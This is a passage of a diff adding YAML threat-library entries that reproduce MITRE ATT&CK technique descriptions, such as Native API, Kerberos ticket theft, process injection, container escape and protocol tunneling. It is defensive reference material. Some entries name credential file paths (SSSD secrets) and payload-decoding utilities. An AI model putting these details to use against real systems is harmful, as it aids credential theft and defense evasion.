+      Once the extension is installed, it can browse to websites in the background,
+      steal all information that a user enters into a browser (including credentials),
+      and be used as an installer for a RAT for persistence.(Citation: Chrome Extension
+      Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome
+      Extension Steals Creds)(Citation: Catch All Chrome Extension)
+
+
+      There have also been instances of botnets using a persistent backdoor through
+      malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been
+      similar examples of extensions being used for command & control.(Citation: Chrome
+      Extension C2 Malware)
+
+      https://attack.mitre.org/techniques/T1176'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1106
+    name: T1106 - Native API
+    provider: MITRE ATT&CK
+    description: 'Adversaries may interact with the native OS application programming
+      interface (API) to execute behaviors. Native APIs provide a controlled means
+      of calling low-level OS services within the kernel, such as those involving
+      hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation:
+      Linux Kernel API) These native APIs are leveraged by the OS during system boot
+      (when other system components are not yet initialized) as well as carrying out
+      tasks and requests during routine operations.
+
+
+      Adversaries may abuse these OS API functions as a means of executing behaviors.
+      Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+      the native API and its hierarchy of interfaces provide mechanisms to interact
+      with and utilize various components of a victimized system.
+
+
+      Native API functions (such as <code>NtCreateProcess</code>) may be directed
+      invoked via system calls / syscalls, but these features are also often exposed
+      to user-mode applications via interfaces and libraries.(Citation: OutFlank System
+      Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example,
+      functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code>
+      will allow programs and scripts to start other processes.(Citation: Microsoft
+      CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary,
+      run a CLI command, load modules, etc. as thousands of similar API functions
+      exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation:
+      GLIBC)
+
+
+      Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are
+      also available to interact with native APIs. These frameworks typically provide
+      language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability
+      of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS
+      Cocoa)(Citation: macOS Foundation)
+
+
+      Adversaries may use assembly to directly or in-directly invoke syscalls in an
+      attempt to subvert defensive sensors and detection signatures such as user mode
+      API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper
+      with sensors and defensive tools associated with API monitoring, such as unhooking
+      monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).
+
+      https://attack.mitre.org/techniques/T1106'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1202
+    name: T1202 - Indirect Command Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse utilities that allow for command execution
+      to bypass security restrictions that limit the use of command-line interpreters.
+      Various Windows utilities may be used to execute commands, possibly without
+      invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193),
+      the Program Compatibility Assistant (pcalua.exe), components of the Windows
+      Subsystem for Linux (WSL), as well as other utilities may invoke the execution
+      of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+      Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation:
+      Evi1cg Forfiles Nov 2017)
+
+
+      Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005),
+      specifically to perform arbitrary execution while subverting detections and/or
+      mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106)
+      or file extensions more commonly associated with malicious payloads.
+
+      https://attack.mitre.org/techniques/T1202'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1091
+    name: T1091 - Replication Through Removable Media
+    provider: MITRE ATT&CK
+    description: 'Adversaries may move onto systems, possibly those on disconnected
+      or air-gapped networks, by copying malware to removable media and taking advantage
+      of Autorun features when the media is inserted into a system and executes. In
+      the case of Lateral Movement, this may occur through modification of executable
+      files stored on removable media or by copying malware and renaming it to look
+      like a legitimate file to trick users into executing it on a separate system.
+      In the case of Initial Access, this may occur through manual manipulation of
+      the media, modification of systems used to initially format the media, or modification
+      to the media''s firmware itself.
+
+
+      Mobile devices may also be used to infect PCs with malware if connected via
+      USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using
+      devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation:
+      Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For
+      example, when a smartphone is connected to a system, it may appear to be mounted
+      similar to a USB-connected disk drive. If malware that is compatible with the
+      connected system is on the mobile device, the malware could infect the machine
+      (especially if Autorun features are enabled).
+
+      https://attack.mitre.org/techniques/T1091'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1005
+    name: T1005 - Data from Local System
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search local system sources, such as file systems
+      and configuration files or local databases, to find files of interest and sensitive
+      data prior to Exfiltration.
+
+
+      Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+      such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network
+      Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality
+      to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco)
+      Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119)
+      on the local system.
+
+      https://attack.mitre.org/techniques/T1005'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1140
+    name: T1140 - Deobfuscate/Decode Files or Information
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
+      to hide artifacts of an intrusion from analysis. They may require separate mechanisms
+      to decode or deobfuscate that information depending on how they intend to use
+      it. Methods for doing that include built-in functionality of malware or by using
+      utilities present on the system.
+
+
+      One such example is the use of [certutil](https://attack.mitre.org/software/S0160)
+      to decode a remote access tool portable executable file that has been hidden
+      inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi
+      Arabia) Another example is using the Windows <code>copy /b</code> command to
+      reassemble binary fragments into a malicious payload.(Citation: Carbon Black
+      Obfuscation Sept 2016)
+
+
+      Sometimes a user''s action may be required to open it for deobfuscation or decryption
+      as part of [User Execution](https://attack.mitre.org/techniques/T1204). The
+      user may also be required to input a password to open a password protected compressed/encrypted
+      file that was provided by the adversary. (Citation: Volexity PowerDuke November
+      2016)
+
+      https://attack.mitre.org/techniques/T1140'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1562
+    name: T1562 - Impair Defenses
+    provider: MITRE ATT&CK
+    description: 'Adversaries may maliciously modify components of a victim environment
+      in order to hinder or disable defensive mechanisms. This not only involves impairing
+      preventative defenses, such as firewalls and anti-virus, but also detection
+      capabilities that defenders can use to audit activity and identify malicious
+      behavior. This may also span both native defenses as well as supplemental capabilities
+      installed by users and administrators.
+
+
+      Adversaries may also impair routine operations that contribute to defensive
+      hygiene, such as blocking users from logging out of a computer or stopping it
+      from being shut down. These restrictions can further enable malicious operations
+      as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+
+
+      Adversaries could also target event aggregation and analysis mechanisms, or
+      otherwise disrupt these procedures by altering other system components.
+
+      https://attack.mitre.org/techniques/T1562'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1195
+    name: T1195 - Supply Chain Compromise
+    provider: MITRE ATT&CK
+    description: "Adversaries may manipulate products or product delivery mechanisms\
+      \ prior to receipt by a final consumer for the purpose of data or system compromise.\n\
+      \nSupply chain compromise can take place at any stage of the supply chain including:\n\
+      \n* Manipulation of development tools\n* Manipulation of a development environment\n\
+      * Manipulation of source code repositories (public or private)\n* Manipulation\
+      \ of source code in open-source dependencies\n* Manipulation of software update/distribution\
+      \ mechanisms\n* Compromised/infected system images (multiple cases of removable\
+      \ media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider\
+      \ Electric USB Malware) \n* Replacement of legitimate software with modified\
+      \ versions\n* Sales of modified/counterfeit products to legitimate distributors\n\
+      * Shipment interdiction\n\nWhile supply chain compromise can impact any component\
+      \ of hardware or software, adversaries looking to gain execution have often\
+      \ focused on malicious additions to legitimate software in software distribution\
+      \ or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil\
+      \ 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired\
+      \ victim set or malicious software may be distributed to a broad set of consumers\
+      \ but only move on to additional tactics on specific victims.(Citation: Symantec\
+      \ Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five\
+      \ SK 2011) Popular open source projects that are used as dependencies in many\
+      \ applications may also be targeted as a means to add malicious code to users\
+      \ of the dependency.(Citation: Trendmicro NPM Compromise)\nhttps://attack.mitre.org/techniques/T1195"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1190
+    name: T1190 - Exploit Public-Facing Application
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to exploit a weakness in an Internet-facing\
+      \ host or system to initially access a network. The weakness in the system can\
+      \ be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited\
+      \ applications are often websites/web servers, but can also include databases\
+      \ (like SQL), standard services (like SMB or SSH), network device administration\
+      \ and management protocols (like SNMP and Smart Install), and any other system\
+      \ with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation:\
+      \ CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure\
+      \ Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169)\
+      \ Depending on the flaw being exploited this may also involve [Exploitation\
+      \ for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an\
+      \ application is hosted on cloud-based infrastructure and/or is containerized,\
+      \ then exploiting it may lead to compromise of the underlying instance or container.\
+      \ This can allow an adversary a path to access the cloud or container APIs,\
+      \ exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611),\
+      \ or take advantage of weak identity and access management policies.\n\nAdversaries\
+      \ may also exploit edge network infrastructure and related appliances, specifically\
+      \ targeting devices that do not support robust host-based defenses.(Citation:\
+      \ Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites\
+      \ and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based\
+      \ vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)\nhttps://attack.mitre.org/techniques/T1190"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1558
+    name: T1558 - Steal or Forge Kerberos Tickets
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to subvert Kerberos authentication by stealing\
+      \ or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).\
+      \ Kerberos is an authentication protocol widely used in modern Windows domain\
+      \ environments. In Kerberos environments, referred to as \u201Crealms\u201D\
+      , there are three basic participants: client, service, and Key Distribution\
+      \ Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request\
+      \ access to a service and through the exchange of Kerberos tickets, originating\
+      \ from KDC, they are granted access after having successfully authenticated.\
+      \ The KDC is responsible for both authentication and ticket granting.  Adversaries\
+      \ may attempt to abuse Kerberos by stealing tickets or forging tickets to enable\
+      \ unauthorized access.\n\nOn Windows, the built-in <code>klist</code> utility\
+      \ can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft\
+      \ Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials\
+      \ locally in the credential cache file referred to as the \"ccache\". The credentials\
+      \ are stored in the ccache file while they remain valid and generally while\
+      \ a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise\
+      \ Linux systems, and derivative distributions, the System Security Services\
+      \ Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of\
+      \ the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code>\
+      \ as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>.\
+      \ Both files require root access to read. If an adversary is able to access\
+      \ the database and key, the credential cache Kerberos blob can be extracted\
+      \ and converted into a usable Kerberos ccache file that adversaries may use\
+      \ for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The\
+      \ ccache file may also be converted into a Windows format using tools such as\
+      \ Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation:\
+      \ Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format,\
+      \ similar to Linux. By default, access to these ccache entries is federated\
+      \ through the KCM daemon process via the Mach RPC protocol, which uses the caller's\
+      \ environment to determine access. The storage location for these ccache entries\
+      \ is influenced by the <code>/etc/krb5.conf</code> configuration file and the\
+      \ <code>KRB5CCNAME</code> environment variable which can specify to save them\
+      \ to disk or keep them protected via the KCM daemon. Users can interact with\
+      \ ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>,\
+      \ and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework.\
+      \ Adversaries can use open source tools to interact with the ccache files directly\
+      \ or to use the Kerberos framework to call lower-level APIs for extracting the\
+      \ user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS\
+      \ 2019)(Citation: macOS kerberos framework MIT)\nhttps://attack.mitre.org/techniques/T1558"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1555
+    name: T1555 - Credentials from Password Stores
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search for common password storage locations to
+      obtain user credentials. Passwords are stored in several places on a system,
+      depending on the operating system or application holding the credentials. There
+      are also specific applications and services that store passwords to make them
+      easier for users to manage and maintain, such as password managers and cloud
+      secrets vaults. Once credentials are obtained, they can be used to perform lateral
+      movement and access restricted information.
+
+      https://attack.mitre.org/techniques/T1555'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1567
+    name: T1567 - Exfiltration Over Web Service
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use an existing, legitimate external Web service
+      to exfiltrate data rather than their primary command and control channel. Popular
+      Web services acting as an exfiltration mechanism may give a significant amount
+      of cover due to the likelihood that hosts within a network are already communicating
+      with them prior to compromise. Firewall rules may also already exist to permit
+      traffic to these services.
+
+
+      Web service providers also commonly use SSL/TLS encryption, giving adversaries
+      an added level of protection.
+
+      https://attack.mitre.org/techniques/T1567'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1219
+    name: T1219 - Remote Access Software
+    provider: MITRE ATT&CK
+    description: "An adversary may use legitimate desktop support and remote access\
+      \ software to establish an interactive command and control channel to target\
+      \ systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`,\
+      \ `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and\
+      \ management (RMM) tools, are commonly used as legitimate technical support\
+      \ software and may be allowed by application control within a target environment.(Citation:\
+      \ Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation:\
+      \ CrySyS Blog TeamSpy)\n\nRemote access software may be installed and used post-compromise\
+      \ as an alternate communications channel for redundant access or as a way to\
+      \ establish an interactive remote desktop session with the target system. They\
+      \ may also be used as a component of malware to establish a reverse connection\
+      \ or back-connect to a service or adversary controlled system.\n \nAdversaries\
+      \ may similarly abuse response features included in EDR and other defensive\
+      \ tools that enable remote access.\n\nInstallation of many remote access software\
+      \ may also include persistence (e.g., the software's installation routine creates\
+      \ a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).\nhttps://attack.mitre.org/techniques/T1219"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1036
+    name: T1036 - Masquerading
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to manipulate features of their artifacts
+      to make them appear legitimate or benign to users and/or security tools. Masquerading
+      occurs when the name or location of an object, legitimate or malicious, is manipulated
+      or abused for the sake of evading defenses and observation. This may include
+      manipulating file metadata, tricking users into misidentifying the file type,
+      and giving legitimate task or service names.
+
+
+      Renaming abusable system utilities to evade security monitoring is also a form
+      of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS
+      Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090)
+      or VPNs to disguise IP addresses, which can allow adversaries to blend in with
+      normal network traffic and bypass conditional access policies or anti-abuse
+      protections.
+
+      https://attack.mitre.org/techniques/T1036'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1552
+    name: T1552 - Unsecured Credentials
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search compromised systems to find and obtain insecurely
+      stored credentials. These credentials can be stored and/or misplaced in many
+      locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)),
+      operating system or application-specific repositories (e.g. [Credentials in
+      Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized
+      files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).
+
+      https://attack.mitre.org/techniques/T1552'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1659
+    name: T1659 - Content Injection
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gain access and continuously communicate with victims
+      by injecting malicious content into systems through online network traffic.
+      Rather than luring victims to malicious payloads hosted on a compromised website
+      (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed
+      by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries
+      may initially access victims through compromised data-transfer channels where
+      they can manipulate traffic and/or inject their own content. These compromised
+      online network channels may also be used to deliver additional payloads (i.e.,
+      [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other
+      data to already compromised systems.(Citation: ESET MoustachedBouncer)
+
+
+      Adversaries may inject content to victim systems in various ways, including:
+
+
+      * From the middle, where the adversary is in-between legitimate online client-server
+      communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557),
+      which describes AiTM activity solely within an enterprise environment) (Citation:
+      Kaspersky Encyclopedia MiTM)
+
+      * From the side, where malicious content is injected and races to the client
+      as a fake response to requests of a legitimate online server (Citation: Kaspersky
+      ManOnTheSide)
+
+
+      Content injection is often the result of compromised upstream communication
+      channels, for example at the level of an internet service provider (ISP) as
+      is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation:
+      ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)
+
+      https://attack.mitre.org/techniques/T1659'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1055
+    name: T1055 - Process Injection
+    provider: MITRE ATT&CK
+    description: "Adversaries may inject code into processes in order to evade process-based\
+      \ defenses as well as possibly elevate privileges. Process injection is a method\
+      \ of executing arbitrary code in the address space of a separate live process.\
+      \ Running code in the context of another process may allow access to the process's\
+      \ memory, system/network resources, and possibly elevated privileges. Execution\
+      \ via process injection may also evade detection from security products since\
+      \ the execution is masked under a legitimate process. \n\nThere are many different\
+      \ ways to inject code into a process, many of which abuse legitimate functionalities.\
+      \ These implementations exist for every major OS but are typically platform\
+      \ specific. \n\nMore sophisticated samples may perform multiple process injections\
+      \ to segment modules and further evade detection, utilizing named pipes or other\
+      \ inter-process communication (IPC) mechanisms as a communication channel.\n\
+      https://attack.mitre.org/techniques/T1055"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1205
+    name: T1205 - Traffic Signaling
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use traffic signaling to hide open ports or other
+      malicious functionality used for persistence or command and control. Traffic
+      signaling involves the use of a magic value or sequence that must be sent to
+      a system to trigger a special response, such as opening a closed port or executing
+      a malicious task. This may take the form of sending a series of packets with
+      certain characteristics before a port will be opened that the adversary can
+      use for command and control. Usually this series of packets consists of attempted
+      connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)),
+      but can involve unusual flags, specific strings, or other unique characteristics.
+      After the sequence is completed, opening a port may be accomplished by the host-based
+      firewall, but could also be implemented by custom software.
+
+
+      Adversaries may also communicate with an already open port, but the service
+      listening on that port will only respond to commands or trigger other malicious
+      functionality if passed the appropriate magic value(s).
+
+
+      The observation of the signal packets to trigger the communication can be conducted
+      through different methods. One means, originally implemented by Cd00r (Citation:
+      Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets
+      in question. Another method leverages raw sockets, which enables the malware
+      to use ports that are already open for use by other programs.
+
+
+      On network devices, adversaries may use crafted packets to enable [Network Device
+      Authentication](https://attack.mitre.org/techniques/T1556/004) for standard
+      services offered by the device such as telnet.  Such signaling may also be used
+      to open a closed service port such as telnet, or to trigger module modification
+      of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries
+      may use crafted packets to attempt to connect to one or more (open or closed)
+      ports, but may also attempt to connect to a router interface, broadcast, and
+      network address IP on the same port in order to achieve their goals and objectives.(Citation:
+      Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco
+      Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices,
+      adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+      due to the monolithic nature of the architecture.
+
+
+      Adversaries may also use the Wake-on-LAN feature to turn on powered off systems.
+      Wake-on-LAN is a hardware feature that allows a powered down system to be powered
+      on, or woken up, by sending a magic packet to it. Once the system is powered
+      on, it may become a target for lateral movement.(Citation: Bleeping Computer
+      - Ryuk WoL)(Citation: AMD Magic Packet)
+
+      https://attack.mitre.org/techniques/T1205'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1218
+    name: T1218 - System Binary Proxy Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may bypass process and/or signature-based defenses by
+      proxying execution of malicious content with signed, or otherwise trusted, binaries.
+      Binaries used in this technique are often Microsoft-signed files, indicating
+      that they have been either downloaded from Microsoft or are already native in
+      the operating system.(Citation: LOLBAS Project) Binaries signed with trusted
+      digital certificates can typically execute on Windows systems protected by digital
+      signature validation. Several Microsoft signed binaries that are default on
+      Windows installations can be used to proxy execution of other files or commands.
+
+
+      Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code>
+      to proxy execution of malicious commands.(Citation: split man page)(Citation:
+      GTFO split)
+
+      https://attack.mitre.org/techniques/T1218'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1620
+    name: T1620 - Reflective Code Loading
+    provider: MITRE ATT&CK
+    description: "Adversaries may reflectively load code into a process in order to\
+      \ conceal the execution of malicious payloads. Reflective loading involves allocating\
+      \ then executing payloads directly within the memory of the process, vice creating\
+      \ a thread or process backed by a file path on disk. Reflectively loaded payloads\
+      \ may be compiled binaries, anonymous files (only present in RAM), or just snubs\
+      \ of fileless executable code (ex: position-independent shellcode).(Citation:\
+      \ Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF\
+      \ Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\n\nReflective code\
+      \ injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055)\
+      \ except that the \u201Cinjection\u201D loads code into the processes\u2019\
+      \ own memory instead of that of a separate process. Reflective loading may evade\
+      \ process-based detections since the execution of the arbitrary code may be\
+      \ masked within a legitimate or otherwise benign process. Reflectively loading\
+      \ payloads directly into memory may also avoid creating files or other artifacts\
+      \ on disk, while also enabling malware to keep these payloads encrypted (or\
+      \ otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation:\
+      \ 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)\n\
+      https://attack.mitre.org/techniques/T1620"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1611
+    name: T1611 - Escape to Host
+    provider: MITRE ATT&CK
+    description: "Adversaries may break out of a container to gain access to the underlying\
+      \ host. This can allow an adversary access to other containerized resources\
+      \ from the host level or to the host itself. In principle, containerized resources\
+      \ should provide a clear separation of application functionality and be isolated\
+      \ from the host environment.(Citation: Docker Overview)\n\nThere are multiple\
+      \ ways an adversary may escape to a host environment. Examples include creating\
+      \ a container configured to mount the host\u2019s filesystem using the bind\
+      \ parameter, which allows the adversary to drop payloads and execute control\
+      \ utilities such as cron on the host; utilizing a privileged container to run\
+      \ commands or load a malicious kernel module on the underlying host; or abusing\
+      \ system calls such as `unshare` and `keyctl` to escalate privileges and steal\
+      \ secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation:\
+      \ Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes\
+      \ Container Escape)(Citation: Keyctl-unmask)\n\nAdditionally, an adversary may\
+      \ be able to exploit a compromised container with a mounted container management\
+      \ socket, such as `docker.sock`, to break out of the container via a [Container\
+      \ Administration Command](https://attack.mitre.org/techniques/T1609).(Citation:\
+      \ Container Escape) Adversaries may also escape via [Exploitation for Privilege\
+      \ Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting\
+      \ vulnerabilities in global symbolic links in order to access the root directory\
+      \ of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining\
+      \ access to the host may provide the adversary with the opportunity to achieve\
+      \ follow-on objectives, such as establishing persistence, moving laterally within\
+      \ the environment, or setting up a command and control channel on the host.\n\
+      https://attack.mitre.org/techniques/T1611"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1010
+    name: T1010 - Application Window Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to get a listing of open application windows.
+      Window listings could convey information about how the system is used.(Citation:
+      Prevailion DarkWatchman 2021) For example, information about application windows
+      could be used identify potential data to collect as well as identifying security
+      tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001))
+      to evade.(Citation: ESET Grandoreiro April 2020)
+
+
+      Adversaries typically abuse system features for this type of enumeration. For
+      example, they may gather information through native system features such as
+      [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
+      commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
+
+      https://attack.mitre.org/techniques/T1010'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1029
+    name: T1029 - Scheduled Transfer
+    provider: MITRE ATT&CK
+    description: 'Adversaries may schedule data exfiltration to be performed only
+      at certain times of day or at certain intervals. This could be done to blend
+      traffic patterns with normal activity or availability.
+
+
+      When scheduled exfiltration is used, other exfiltration techniques likely apply
+      as well to transfer the information out of the network, such as [Exfiltration
+      Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration
+      Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
+
+      https://attack.mitre.org/techniques/T1029'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1525
+    name: T1525 - Implant Internal Image
+    provider: MITRE ATT&CK
+    description: "Adversaries may implant cloud or container images with malicious\
+      \ code to establish persistence after gaining access to an environment. Amazon\
+      \ Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP)\
+      \ Images, and Azure Images as well as popular container runtimes such as Docker\
+      \ can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001),\
+      \ this technique focuses on adversaries implanting an image in a registry within\
+      \ a victim\u2019s environment. Depending on how the infrastructure is provisioned,\
+      \ this could provide persistent access if the infrastructure provisioning tool\
+      \ is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image\
+      \ Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting\
+      \ backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September\
+      \ 2019) If an adversary has access to a compromised AWS instance, and permissions\
+      \ to list the available container images, they may implant a backdoor such as\
+      \ a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino\
+      \ Labs Cloud Image Backdoor Technique Sept 2019)\nhttps://attack.mitre.org/techniques/T1525"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1572
+    name: T1572 - Protocol Tunneling
+    provider: MITRE ATT&CK
+    description: "Adversaries may tunnel network communications to and from a victim\
+      \ system within a separate protocol to avoid detection/network filtering and/or\
+      \ enable access to otherwise unreachable systems. Tunneling involves explicitly\
+      \ encapsulating a protocol within another. This behavior may conceal malicious\
+      \ traffic by blending in with existing traffic and/or provide an outer layer\
+      \ of encryption (similar to a VPN). Tunneling could also enable routing of network\
+      \ packets that would otherwise not reach their intended destination, such as\
+      \ SMB, RDP, or other traffic that would be filtered by network appliances or\
+      \ not routed over the Internet. \n\nThere are various means to encapsulate a\
+      \ protocol within another protocol. For example, adversaries may perform SSH\
+      \ tunneling (also known as SSH port forwarding), which involves forwarding arbitrary\
+      \ data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol\
+      \ Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by\
+      \ adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568).\
+      \ Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be\
+      \ encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua\
+      \ JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)\
+      \ in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or\
+      \ [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to\
+      \ further conceal C2 communications and infrastructure.\nhttps://attack.mitre.org/techniques/T1572"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1550
+    name: T1550 - Use Alternate Authentication Material
+    provider: MITRE ATT&CK
+    description: "Adversaries may use alternate authentication material, such as password\
+      \ hashes, Kerberos tickets, and application access tokens, in order to move\
+      \ laterally within an environment and bypass normal system access controls.\
